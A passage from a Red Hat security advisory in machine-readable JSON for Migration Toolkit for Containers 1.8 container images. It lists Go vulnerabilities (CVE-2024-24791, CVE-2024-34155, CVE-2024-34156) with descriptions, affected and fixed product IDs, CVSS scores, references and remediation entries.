"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped IPv6 addresses"
},
{
"cve": "CVE-2024-24791",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2024-07-02T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2295310"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Go. The net/http module mishandles specific server responses from HTTP/1.1 client requests. This issue may render a connection invalid and cause a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "net/http: Denial of service due to improper 100-continue handling in net/http",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "An attacker would need to control a malicious server and induce a client to connect to it, requiring some amount of preparation outside of the attacker\u0027s control. This reduces the severity score of this flaw to Moderate.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
],
"known_not_affected": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-24791"
},
{
"category": "external",
"summary": "RHBZ#2295310",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2295310"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-24791",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24791"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-24791",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24791"
},
{
"category": "external",
"summary": "https://go.dev/cl/591255",
"url": "https://go.dev/cl/591255"
},
{
"category": "external",
"summary": "https://go.dev/issue/67555",
"url": "https://go.dev/issue/67555"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-dev/c/t0rK-qHBqzY/m/6MMoAZkMAgAJ",
"url": "https://groups.google.com/g/golang-dev/c/t0rK-qHBqzY/m/6MMoAZkMAgAJ"
}
],
"release_date": "2024-07-02T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-12-10T01:37:19+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:10906"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "net/http: Denial of service due to improper 100-continue handling in net/http"
},
{
"cve": "CVE-2024-34155",
"cwe": {
"id": "CWE-674",
"name": "Uncontrolled Recursion"
},
"discovery_date": "2024-09-06T21:20:06.929766+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310527"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the go/parser package of the Golang standard library. Calling any Parse functions on Go source code containing deeply nested literals can cause a panic due to stack exhaustion.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
],
"known_not_affected": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-34155"
},
{
"category": "external",
"summary": "RHBZ#2310527",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310527"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-34155",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34155"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-34155",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34155"
},
{
"category": "external",
"summary": "https://go.dev/cl/611238",
"url": "https://go.dev/cl/611238"
},
{
"category": "external",
"summary": "https://go.dev/issue/69138",
"url": "https://go.dev/issue/69138"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk",
"url": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2024-3105",
"url": "https://pkg.go.dev/vuln/GO-2024-3105"
}
],
"release_date": "2024-09-06T21:15:11.947000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-12-10T01:37:19+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:10906"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion"
},
{
"cve": "CVE-2024-34156",
"cwe": {
"id": "CWE-674",
"name": "Uncontrolled Recursion"
},
"discovery_date": "2024-09-06T21:20:09.377905+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310528"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the encoding/gob package of the Golang standard library. Calling Decoder.Decoding, a message that contains deeply nested structures, can cause a panic due to stack exhaustion. This is a follow-up to CVE-2022-30635.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability in Go\u0027s `encoding/gob` package is of high severity because it exposes applications to potential Denial of Service (DoS) attacks through stack exhaustion. Since `gob` relies on recursive function calls to decode nested structures, an attacker could exploit this by sending crafted messages with excessively deep nesting, causing the application to panic due to stack overflow. This risk is particularly important in scenarios where untrusted or external input is processed, as it can lead to system unavailability or crashes, undermining the reliability and availability of services.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
],
"known_not_affected": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-34156"
},
{
"category": "external",
"summary": "RHBZ#2310528",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310528"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-34156",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34156"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-34156",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34156"
},
{
"category": "external",
"summary": "https://go.dev/cl/611239",
"url": "https://go.dev/cl/611239"
},
{
"category": "external",
"summary": "https://go.dev/issue/69139",
"url": "https://go.dev/issue/69139"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk",
"url": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2024-3106",
"url": "https://pkg.go.dev/vuln/GO-2024-3106"
}
],
"release_date": "2024-09-06T21:15:12.020000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-12-10T01:37:19+00:00",
